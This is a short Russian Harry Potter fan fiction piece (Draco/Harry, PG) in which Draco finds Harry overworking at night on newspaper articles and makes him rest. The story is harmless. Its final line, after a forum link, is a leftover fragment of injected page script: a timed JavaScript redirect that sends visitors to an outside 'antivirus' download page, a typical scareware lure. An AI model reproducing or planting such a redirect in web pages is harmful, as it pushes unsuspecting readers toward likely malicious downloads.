Стук

Автор: Аламарана
Размещение: свяжитесь со мной
Пейринг: ДМ/ГП
Рейтинг: PG
Жанр: фиклет
Disclaimer: ничего не моё, не было и не будет.
Summary: На что вы готовы пойти ради любимого?
Посвящение: Танюхе, за полное совпадение наших интересов.

Стук печатной машинки.

За стеной перекатываются под умелыми пальцами тысячи маленьких чёрных значков. Строчка неторопливо ползёт по чистому белому листу бумаги. Воспалённые глаза лихорадочно пробегают напечатанные страницы.

Драко не спит. Он лежит на кровати и прислушивается к стуку за стеной. Постепенно ритм сердца приспосабливается к равномерному звуку, одиноко и непрерывно звучащему в ночной тишине. Пальцы стискивают край одеяла. За стеной не подозревают, что он не спит. За стеной думают, что он позабыл обо всех дневных заботах и мирно уснул в кольце рук. Потом это кольцо размыкается, а за стеной начинается стук.

Драко давно свыкся с этим стуком.

Это - много-много складных предложений, и чёрная змейка на бумаге, и статьи и заметки в утренних газетах. Это - торопливая работа по ночам и ложь, что деньги берутся со счёта в Гринготсе.

Это - воспалённые глаза, и хриплый кашель за стеной, и растрёпанные волосы по утрам, и тёмные круги, и нездоровая бледность кожи. Это - быстрый бег до издательства газеты, и готовая статья на столе, и очередная зарплата, которая тайком кладётся в кошелёк.

Это - нежная  улыбка по утрам, и его любимые лакомства, сметаемые со всех прилавков, и даже та мятая пижама, которая небрежно брошена на спинку стула.

Когда он чувствует, что тёплые руки вновь смыкаются вокруг него, а усталая голова склоняется на плечо, он засыпает, от души желая, чтобы его сосед тоже заснул. Но не сегодня.

Стук печатной машинки.

Тишина. Усталые пальцы растирают кожу на висках, поправляют съехавшие на нос очки, приглаживают чёрные волосы.

Драко бесшумно поднимается со смятых простыней. Пять метров по коридору. Пять тихих шагов. Щёлка между дверью и косяком отпечатывается светлой полоской на полу. Драко заглядывает в щёлку.

На столе в беспорядке разбросаны бесчисленные клочки бумаги с коряво нацарапанными материалами для статей. Пальцы проворно снуют по клавишам, торопясь уложиться до семи утра. Чёрная чёлка падает на бледный лоб. Очки блестят перед покрасневшими от недосыпа глазами. Небрежно наброшенный халат открывает плечо. Завтра в Ежедневном Пророке вновь появится статья, подписанная «Специальный репортёр газеты Гарри Поттер».

Стук печатной машинки.

Драко сдерживает отчаянный стон. Больше всего ему хочется броситься к нему, обнять и как следует встряхнуть, крича: «Отдохни хоть немного, думаешь, я не знаю, как ты ломаешься по ночам, чтобы заработать эти свои бешеные деньги? Думаешь, не слышу надрывного кашля, не вижу уставших глаз, не вижу изможденности, которую ты прячешь за нежной улыбкой? Когда ты обнимаешь меня, целуешь, думаешь, я не чувствую твоей усталости?»

Драко сдерживает себя. Вместо этого он тихо подбирается к сидящему спиной к нему юноше. Тот даже не замечает его, только следит за бегающими пальцами. Но как только нежные руки смыкаются вокруг его талии, тело прижимается к спине, губы начинают легонько ласкать мочку уха, Гарри издаёт удивлённый стон.

- Драко… ты не спишь?

- Нет…- губы переместились к бьющейся жилке на шее. -  Я знаю, Гарри.

- Но…

- Стук машинки не даёт спать, знаешь ли. Прекрати так ломаться. Всех денег не заработаешь, нам и так хватает с лихвой. Думаешь, я не вижу твоей усталости? Ты бы видел себя в зеркало.

Драко поворачивает его лицом к себе и кладёт руки на плечи. Загорелые руки обнимают его в ответ. Чёрная голова устало опускается на бледное плечо. Драко легко целует его волосы.

- Прости. Но мне надо работать, ты же знаешь.

- Нет, не надо. Я связался с твоим издательством и сказал, что ты заболел. Они выслали тебе деньги и ехидно пожелали обязательно  выздоравливать дней этак через тридцать пять.

Удивлённый недоверчивый взгляд зелёных глаз. Драко улыбнулся и поцеловал его в лоб, в переносицу, пощекотал кончик носа, прошёлся языком по желанным губам, трепетно отозвавшимся в ответ.

- Я остался с тобой не для того, чтобы видеть твою усталость, Гарри.

Руки увлекают его в соседнюю комнату, снимают халат, укутывают одеялом. Гарри прижался к блондину и потянулся к его губам, мягко целующим его в ответ. Драко нежно улыбается и гладит спутанные вихры его волос.

- Люблю тебя…- только и может прошептать Гарри, прежде чем провалиться в сон.

- Спокойной ночи, горе моё...- ласково отзывается Драко, обнимая его крепче.

Заснуть легко, зная, что стук машинки будет теперь гораздо реже слышен за стеной.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>